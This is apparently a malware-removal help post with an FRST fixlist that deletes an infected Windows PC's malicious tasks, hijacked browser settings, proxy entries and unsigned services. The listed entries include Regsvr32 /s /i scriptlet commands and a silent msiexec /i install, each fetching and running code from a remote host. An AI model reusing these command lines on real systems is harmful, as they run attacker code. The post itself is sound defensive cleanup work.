Uninstall Advanced SystemCare 10, AlphaGo, IObit Malware Fighter 4, Java 8 Update 111, YAC (Yet Another Cleaner!).

Open the system Notepad and paste:

CloseProcesses:
Task: {070C2F94-BE21-455A-AAF8-748E0104F4A5} - System32\Tasks\ASC10_PerformanceMonitor => C:\Program Files (x86)\IObit\Advanced SystemCare\Monitor.exe
Task: {33189325-A415-44A2-8156-5156EDC97B7B} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1SNWlSN8F8MTQYNjLXOTVXRYFcMTNWNdM1OWk3NjI2OF== scrobj.dll
Task: {7B248FC2-DEEE-4904-BAC2-59A0A653AFD8} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-4228095435-3539589198-294085663-1002Core => C:\Users\KUBA7\AppData\Local\Facebook\Update\FacebookUpdate.exe [2013-10-07] (Facebook Inc.)
Task: {7E644E38-3E39-4970-BBB6-2C4036CA3120} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1SNWlSN8F8MTQYNjLXOTVXRYFcMTNWNdM1OWk3NjI2OF== scrobj.dll
Task: {A48001A6-7627-479D-8C0F-06722CB0072F} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2017-01-27] (AVAST Software)
Task: {AB0FC512-C892-4715-85A6-B49C49D33594} - System32\Tasks\ASC10_SkipUac_KUBA7 => C:\Program Files (x86)\IObit\Advanced SystemCare\ASC.exe
Task: {C0B5D6E4-C443-4059-8A0D-1389A40FB899} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-4228095435-3539589198-294085663-1002UA => C:\Users\KUBA7\AppData\Local\Facebook\Update\FacebookUpdate.exe [2013-10-07] (Facebook Inc.)
Task: {DF7454D0-6550-483B-9564-D06F0C4A1916} - System32\Tasks\avastBCLRestartS-1-5-21-4228095435-3539589198-294085663-1002 => Chrome.exe
Task: {EF072849-329B-4C3A-866E-63B75A737531} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-17] () <==== UWAGA
Task: C:\WINDOWS\Tasks\FacebookUpdateTaskUserS-1-5-21-4228095435-3539589198-294085663-1002Core.job => C:\Users\KUBA7\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\WINDOWS\Tasks\FacebookUpdateTaskUserS-1-5-21-4228095435-3539589198-294085663-1002UA.job => C:\Users\KUBA7\AppData\Local\Facebook\Update\FacebookUpdate.exe
Shortcut: C:\Users\KUBA7\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Bangtony\Application\chrome.exe (Google Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Bangtony\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Bangtony\Application\chrome.exe (Google Inc.)
ShortcutWithArgument: C:\Users\KUBA7\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://bigfarm.goodgamestudios.com/?w=239064
ShortcutWithArgument: C:\Users\KUBA7\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe [35736 2012-04-04] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-04-04] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [IObit Malware Fighter] => C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe [6006560 2016-11-01] (IObit)
HKLM-x32\...\RunOnce: [DeleteOnReboot] => C:\Users\KUBA7\AppData\Local\Temp\DeleteOnReboot.bat [804 2017-05-27] () <===== UWAGA
HKU\S-1-5-21-4228095435-3539589198-294085663-1002\...\Run: [Facebook Update] => C:\Users\KUBA7\AppData\Local\Facebook\Update\FacebookUpdate.exe [138096 2013-10-07] (Facebook Inc.)
HKU\S-1-5-21-4228095435-3539589198-294085663-1002\...\Run: [Advanced SystemCare 10] => "C:\Program Files (x86)\IObit\Advanced SystemCare\ASCTray.exe" /Auto
HKU\S-1-5-21-4228095435-3539589198-294085663-1002\...\Run: [background_fault] => C:\Users\KUBA7\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-27] (AVAST Software) <===== UWAGA
HKU\S-1-5-21-4228095435-3539589198-294085663-1002\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1SNWlSN8F8MTQYNjLXOTVXRYFcMTNWNdM1OWk3NjI2OF== /q
HKU\S-1-5-21-4228095435-3539589198-294085663-1002\...\MountPoints2: {34234e0f-fd3c-11e3-bed5-1867b0863a0f} - "E:\windows\Install\Install.exe"
HKU\S-1-5-21-4228095435-3539589198-294085663-1002\...\MountPoints2: {44102900-8f1e-11e3-824e-806e6f6e6963} - "D:\Autorun.exe"
HKU\S-1-5-21-4228095435-3539589198-294085663-1002\...\MountPoints2: {6b8e869e-9029-11e4-bf18-1867b0863a0f} - "E:\LGAutoRun.exe"
IFEO\DisplaySwitch.exe: [Debugger]
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
IFEO\taskmgr.exe: [Debugger]
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku
BootExecute: autocheck autochk * sdnclean64.exe
GroupPolicy: Ograniczenia - Chrome <======= UWAGA
CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <======= UWAGA
AutoConfigURL: [S-1-5-21-4228095435-3539589198-294085663-1002] => hxxp://nonblocker.com/wpad.dat?3823b2fda3dca681b95123d74d8e9c0022329109
ManualProxies: 0hxxp://nonblocker.com/wpad.dat?3823b2fda3dca681b95123d74d8e9c0022329109
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia <======= UWAGA
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493711659&z=1fbc8ad08fc6b60a3e7a048g3z5t5ccmcg8g5q0w8t&from=ypid&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493711659&z=1fbc8ad08fc6b60a3e7a048g3z5t5ccmcg8g5q0w8t&from=ypid&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493711659&z=1fbc8ad08fc6b60a3e7a048g3z5t5ccmcg8g5q0w8t&from=ypid&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493711659&z=1fbc8ad08fc6b60a3e7a048g3z5t5ccmcg8g5q0w8t&from=ypid&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493711659&z=1fbc8ad08fc6b60a3e7a048g3z5t5ccmcg8g5q0w8t&from=ypid&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493711659&z=1fbc8ad08fc6b60a3e7a048g3z5t5ccmcg8g5q0w8t&from=ypid&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493711659&z=1fbc8ad08fc6b60a3e7a048g3z5t5ccmcg8g5q0w8t&from=ypid&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493711659&z=1fbc8ad08fc6b60a3e7a048g3z5t5ccmcg8g5q0w8t&from=ypid&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC&q={searchTerms}
HKU\S-1-5-21-4228095435-3539589198-294085663-1002\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://www.google.com/search?trackid=sp-006&q={searchTerms}
HKU\S-1-5-21-4228095435-3539589198-294085663-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493711659&z=1fbc8ad08fc6b60a3e7a048g3z5t5ccmcg8g5q0w8t&from=ypid&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC
HKU\S-1-5-21-4228095435-3539589198-294085663-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493711659&z=1fbc8ad08fc6b60a3e7a048g3z5t5ccmcg8g5q0w8t&from=ypid&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493711659&z=1fbc8ad08fc6b60a3e7a048g3z5t5ccmcg8g5q0w8t&from=ypid&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC&q={searchTerms}
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493711659&z=1fbc8ad08fc6b60a3e7a048g3z5t5ccmcg8g5q0w8t&from=ypid&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493711659&z=1fbc8ad08fc6b60a3e7a048g3z5t5ccmcg8g5q0w8t&from=ypid&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC&q={searchTerms}
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493711659&z=1fbc8ad08fc6b60a3e7a048g3z5t5ccmcg8g5q0w8t&from=ypid&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC&q={searchTerms}
SearchScopes: HKLM-x32 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?trackid=sp-006&q={searchTerms}
SearchScopes: HKU\S-1-5-21-4228095435-3539589198-294085663-1002 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493711659&z=1fbc8ad08fc6b60a3e7a048g3z5t5ccmcg8g5q0w8t&from=ypid&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC&q={searchTerms}
SearchScopes: HKU\S-1-5-21-4228095435-3539589198-294085663-1002 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://isearch.omiga-plus.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC&ts=1422551429&type=default&q={searchTerms}
SearchScopes: HKU\S-1-5-21-4228095435-3539589198-294085663-1002 -> {2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0} URL = hxxp://isearch.omiga-plus.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC&ts=1422551429&type=default&q={searchTerms}
SearchScopes: HKU\S-1-5-21-4228095435-3539589198-294085663-1002 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493711659&z=1fbc8ad08fc6b60a3e7a048g3z5t5ccmcg8g5q0w8t&from=ypid&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC&q={searchTerms}
SearchScopes: HKU\S-1-5-21-4228095435-3539589198-294085663-1002 -> {60590C88-1622-486E-B747-262962D8010E} URL = hxxp://isearch.omiga-plus.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC&ts=1422551429&type=default&q={searchTerms}
SearchScopes: HKU\S-1-5-21-4228095435-3539589198-294085663-1002 -> {E733165D-CBCF-4FDA-883E-ADEF965B476C} URL = hxxp://isearch.omiga-plus.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC&ts=1422551429&type=default&q={searchTerms}
FF NewTab: Mozilla\Firefox\Profiles\qecomzfd.default-1485029875237 -> hxxp://www.luckysearch123.com?type=hp&ts=1493971999&from=d6440504&uid=st500lt012-9ws142_w0vandjcxxxxw0vandjc&z=8f90f3a68a7782b64328aa9gdzat7cdt6m1gft9t0q
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\qecomzfd.default-1485029875237 -> Google (avast)
FF SearchEngineOrder.1: Mozilla\Firefox\Profiles\qecomzfd.default-1485029875237 -> luck
FF SearchPlugin: C:\Users\KUBA7\AppData\Roaming\Mozilla\Firefox\Profiles\qecomzfd.default-1485029875237\searchplugins\ourluckysites.xml [2017-05-02]
FF NewTab: Firefox\Firefox\Profiles\qecomzfd.default-1485029875237 -> hxxp://www.luckysearch123.com?type=hp&ts=1493971999&from=d6440504&uid=st500lt012-9ws142_w0vandjcxxxxw0vandjc&z=8f90f3a68a7782b64328aa9gdzat7cdt6m1gft9t0q
FF SearchEngineOrder.1: Firefox\Firefox\Profiles\qecomzfd.default-1485029875237 -> luck
FF SearchPlugin: C:\Users\KUBA7\AppData\Roaming\Firefox\Firefox\Profiles\qecomzfd.default-1485029875237\searchplugins\luck.xml [2017-05-05]
FF SearchPlugin: C:\Users\KUBA7\AppData\Roaming\Firefox\Firefox\Profiles\qecomzfd.default-1485029875237\searchplugins\ourluckysites.xml [2017-05-02]
FF SearchPlugin: C:\Users\KUBA7\AppData\Roaming\Firefox\Firefox\Profiles\qecomzfd.default-1485029875237\searchplugins\startsearch.xml [2017-05-27]
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\195743812.js [2016-12-18] <==== UWAGA (Linkuje do pliku *.cfg)
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\195743812.cfg [2016-12-18] <==== UWAGA
CHR HomePage: Default -> hxxp://isearch.omiga-plus.com/?type=hppp&ts=1422551329&from=cor&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC
CHR StartupUrls: Default -> "hxxp://isearch.omiga-plus.com/?type=hppp&ts=1422551329&from=cor&uid=ST500LT012-9WS142_W0VANDJCXXXXW0VANDJC"
R2 BIT; C:\ProgramData\BIT\BIT.dll [1812992 2017-05-17] (TODO: <公司名>) [Brak podpisu cyfrowego] <==== UWAGA
R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [101528 2017-05-27] () <==== UWAGA
R4 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [131024 2016-12-02] (Elex do Brasil Participações Ltda)
S2 terana; C:\Users\KUBA7\AppData\Local\terana\terana.dll [908288 2017-05-26] (IntertSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA
R2 WinSAPSvc; C:\Users\KUBA7\AppData\Roaming\WinSAPSvc\WinSAP.dll [1932800 2017-05-17] () [Brak podpisu cyfrowego] <==== UWAGA
U4 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
U4 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
U0 aswVmm; Brak ImagePath
S3 AthBTPort; \SystemRoot\system32\DRIVERS\btath_flt.sys [X]
S3 BTATH_A2DP; \SystemRoot\system32\drivers\btath_a2dp.sys [X]
S3 btath_avdt; \SystemRoot\system32\drivers\btath_avdt.sys [X]
S0 BTATH_BUS; System32\drivers\btath_bus.sys [X]
S3 BTATH_HCRP; \SystemRoot\System32\drivers\btath_hcrp.sys [X]
S3 BTATH_HID; \SystemRoot\system32\DRIVERS\btath_hid.sys [X]
S3 BTATH_LWFLT; \SystemRoot\system32\DRIVERS\btath_lwflt.sys [X]
S3 BTATH_RCP; \SystemRoot\System32\drivers\btath_rcp.sys [X]
S3 BtFilter; \SystemRoot\system32\DRIVERS\btfilter.sys [X]
S3 cpuz138; \??\C:\Users\KUBA7\AppData\Local\Temp\cpuz138\cpuz138_x64.sys [X] <==== UWAGA
U2 CSHMDR; Brak ImagePath
S3 huawei_enumerator; \SystemRoot\System32\drivers\ew_jubusenum.sys [X]
R4 nvvad_WaveExtensible; \SystemRoot\system32\drivers\nvvad64v.sys [X]
S3 SBIOSIO; \??\C:\Users\KUBA7\AppData\Local\Temp\__Samsung_Update\SBIOSIO64.sys [X] <==== UWAGA
U2 snare; Brak ImagePath
2017-05-27 14:28 - 2017-05-27 14:28 - 00000000 ____D C:\Users\KUBA7\AppData\Roaming\Firefox
2017-05-27 14:28 - 2017-05-27 14:28 - 00000000 ____D C:\Users\KUBA7\AppData\Local\Bangtony
2017-05-27 14:27 - 2017-05-27 14:27 - 00000000 ____D C:\Users\Public\Documents\Google
2017-05-27 14:27 - 2017-05-27 14:27 - 00000000 ____D C:\Users\KUBA7\AppData\Roaming\WinSAPSvc
2017-05-27 14:27 - 2017-05-27 14:27 - 00000000 ____D C:\Users\KUBA7\AppData\Local\background_fault
2017-05-27 14:27 - 2017-05-27 14:27 - 00000000 ____D C:\Program Files (x86)\Firefox
2017-05-27 14:27 - 2017-05-27 14:27 - 00000000 ____D C:\Program Files (x86)\Bangtony
2017-05-27 13:41 - 2017-05-27 13:50 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2017-05-27 13:41 - 2017-05-27 13:41 - 00000000 ____D C:\WINDOWS\System32\Tasks\Safer-Networking
2017-05-27 13:39 - 2017-05-27 13:40 - 46525608 _____ (Safer-Networking Ltd.) C:\Users\KUBA7\Downloads\spybot-2.4.exe
2017-05-27 13:12 - 2017-05-27 14:22 - 00000000 ____D C:\AdwCleaner
2017-05-03 13:02 - 2017-05-16 17:37 - 00000000 _____ C:\WINDOWS\SysWOW64\1111111
C:\Users\KUBA7\AppData\Local\Temp\DeleteOnReboot.bat
C:\Users\KUBA7\AppData\Local\background_fault\aswRD.exe
EmptyTemp:

Save the file as fixlist.txt and place it next to FRST in the same folder. Run FRST as administrator and click Fix/Napraw.

Scan with Malwarebytes Anti-Malware: http://www.bleepingcomputer.com/download/malwarebytes-anti-malware/